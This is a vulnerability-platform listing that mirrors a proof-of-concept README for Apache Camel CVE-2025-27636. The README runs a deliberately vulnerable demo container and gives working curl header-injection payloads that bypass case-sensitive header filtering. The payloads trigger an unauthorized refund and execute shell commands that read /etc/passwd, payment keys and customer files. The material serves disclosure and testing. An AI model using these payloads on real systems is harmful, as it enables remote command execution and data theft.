漏洞平台

POC详情： 08061139e9b09f57d198f0af027c523ccd1f0873

来源

https://github.com/Crystallen1/CVE-2025-27636-demo

关联漏洞

标题： Apache Camel 安全漏洞 (CVE-2025-27636)
描述：Apache Camel是美国阿帕奇（Apache）基金会的一套开源的基于Enterprise Integration Pattern(企业整合模式，简称EIP)的集成框架。该框架提供企业集成模式的Java对象（POJO）的实现，且通过应用程序接口来配置路由和中介的规则。 Apache Camel存在安全漏洞，该漏洞源于默认过滤机制中存在错误，导致绕过或注入攻击。

介绍

# Apache Camel CVE Demonstration

This project demonstrates security vulnerabilities in Apache Camel related to header injection attacks.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports:
```shell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit vulnerable endpoint by injecting method names:

```shell
# Successful attack - case-sensitive header
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - query parameter injection
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```shell
# Wrong case - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```

### 2. Command Execution Attack

Exploit exec component to execute arbitrary commands:

**Reconnaissance:**
```shell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```shell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"
```

## Verify Attack Results

Check the attack logs inside the container:

```shell

# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint

文件快照


 [4.0K]  /data/pocs/08061139e9b09f57d198f0af027c523ccd1f0873
├── [4.6K]  Dockerfile
├── [4.1K]  pom.xml
├── [3.3K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  camel
        │               ├── [ 881]  CamelCveDemoApplication.java
        │               ├── [4.0K]  config
        │               │   ├── [1.5K]  CamelConfig.java
        │               │   └── [ 903]  CorsConfig.java
        │               ├── [4.0K]  controller
        │               │   └── [ 523]  WebController.java
        │               ├── [4.0K]  routes
        │               │   ├── [5.9K]  BeanRoute.java
        │               │   └── [6.5K]  ExecRoute.java
        │               └── [4.0K]  service
        │                   └── [6.1K]  DemoService.java
        └── [4.0K]  resources
            ├── [ 530]  application.properties
            ├── [1.3K]  logback-spring.xml
            └── [4.0K]  static
                └── [ 11K]  index.html

12 directories, 13 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。